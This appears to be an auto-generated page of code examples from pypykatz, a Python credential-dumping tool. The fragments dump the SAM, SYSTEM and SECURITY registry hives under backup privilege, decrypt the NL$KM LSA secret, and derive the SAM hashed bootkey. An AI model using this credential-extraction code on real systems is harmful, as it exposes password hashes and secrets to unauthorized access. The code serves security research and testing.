How to use the pypykatz.registry.logger.error function in pypykatz

To help you get started, we’ve selected a few pypykatz examples, based on popular ways it is used in public projects.


Example 1 — skelsec/pypykatz, pypykatz/registry/offline_parser.py (fragment):
po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
				logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
			else:
				logger.debug('Dumping %s OK!' % reg_name)
				dumped_names[reg_name] = location
		###
		### Do Parsing here!
		###
		po = None
		if 'SYSTEM' in dumped_names:
			try:
				po = OffineRegistry.from_files(system_name, sam_name if 'SAM' in dumped_names else None, security_name if 'SECURITY' in dumped_names else None)
			except Exception as e:
				import traceback
				traceback.print_exc()
		else:
			logger.error('Failed to dump SYSTEM hive, exiting...')
Example 2 — skelsec/pypykatz, pypykatz/registry/security/security.py:
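def get_NKLM_key(self):
		"""Recover the NL$KM secret from the SECURITY hive into ``self.NKLM_key``.

		Reads ``Policy\\Secrets\\NL$KM\\CurrVal\\default`` from the loaded hive and
		decrypts it with the LSA secret key, which is fetched first when it has not
		been loaded yet. The result is stored on the instance; nothing is returned.

		Raises:
			Exception: if the NL$KM value is not present in the hive.
		"""
		logger.debug('[SECURITY] Fetching NK$LM key...')
		if self.lsa_key is None:
			self.get_lsa_secret_key()

		value = self.hive.get_value('Policy\\Secrets\\NL$KM\\CurrVal\\default')
		if value is None:
			logger.error('[SECURITY] Could not find NL$KM in registry')
			raise Exception('Could not find NL$KM in registry :(')

		# NOTE(review): value[1] is assumed to be the raw value data of the
		# registry entry — confirm against the hive's get_value contract.
		if self.lsa_secret_key_vista_type is True:
			self.NKLM_key = b''
			record = LSA_SECRET.from_bytes(value[1])
			# The first 32 bytes of the record are mixed with the LSA key to
			# derive the AES key; everything after them is the ciphertext.
			key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
			cipher = AESModeOfOperationECB(key)
			ciphertext = record.data[32:]
			n = 16  # AES block size: the ECB cipher decrypts exactly one block per call
			for i in range(0, len(ciphertext), n):
				block = ciphertext[i:i + n]
				if len(block) < n:
					# A trailing partial block is zero-padded so the cipher accepts
					# it; its full output is kept, so the decrypted key length is
					# always a multiple of n.
					block += b'\x00' * (n - len(block))
				self.NKLM_key += cipher.decrypt(block)
		else:
			# Non-Vista-type LSA secret key: the secret is decrypted by the
			# generic decrypt_secret helper instead.
			self.NKLM_key = self.decrypt_secret(self.lsa_key, value[1])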
Example 3 — skelsec/pypykatz, pypykatz/registry/offline_parser.py (fragment):
sys_hive = open(system_path, 'rb')
			po.system_hive = AIOWinRegHive(sys_hive)
		except Exception as e:
			logger.error('Failed to open SYSTEM hive! Reason: %s' % str(e))
			raise e
		
		if sam_path:
			try:
				if notfile == True:
					sam_hive = sam_path
				else:
					sam_hive = open(sam_path, 'rb')

				po.sam_hive = AIOWinRegHive(sam_hive)
			except Exception as e:
				logger.error('Failed to open SAM hive! Reason: %s' % str(e))
				raise e
				
		else:
			logger.warning('SAM hive path not supplied! Parsing SAM will not work')
			
		if security_path:
			try:
				if notfile == True:
					sec_hive = security_path
				else:
					sec_hive = open(security_path, 'rb')				
				po.security_hive = AIOWinRegHive(sec_hive)
			except Exception as e:
				logger.error('Failed to open SECURITY hive! Reason: %s' % str(e))
				raise e
Example 4 — skelsec/pypykatz, pypykatz/registry/sam/sam.py (fragment):
QWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
		DIGITS = b"0123456789012345678901234567890123456789\0"
		
		F = self.hive.get_value(r'SAM\Domains\Account\F')[1]
		logger.log(1,'[SAM] F key value: %s' % F)
		
		domain_properties = DOMAIN_ACCOUNT_F.from_bytes(F)
		
		if isinstance(domain_properties.key_0, SAM_KEY_DATA):
			rc4_key = hashlib.md5(domain_properties.key_0.salt + QWERTY + self.bootkey +DIGITS).digest()
			self.hashed_bootkey = RC4(rc4_key).encrypt(domain_properties.key_0.key + domain_properties.key_0.checksum)
			
			checksum = hashlib.md5(self.hashed_bootkey[:16] + DIGITS + self.hashed_bootkey[:16] + QWERTY).digest()
			
			if checksum != self.hashed_bootkey[16:]:
				logger.error('[SAM] HBootkey checksum verification failed!')
				raise Exception('[SAM] HBootkey checksum verification failed!')
				
		elif isinstance(domain_properties.key_0, SAM_KEY_DATA_AES):
			self.hashed_bootkey = b''
			cipher = AESModeOfOperationCBC(self.bootkey, iv = domain_properties.key_0.salt)
			n = 16
			for block in [domain_properties.key_0.data[i:i+n] for i in range(0, len(domain_properties.key_0.data), n)]:  #terrible, terrible workaround
				self.hashed_bootkey += cipher.decrypt(block)
			
		logger.debug('[SAM] HBootkey: %s' % self.hashed_bootkey.hex())
		return self.hashed_bootkey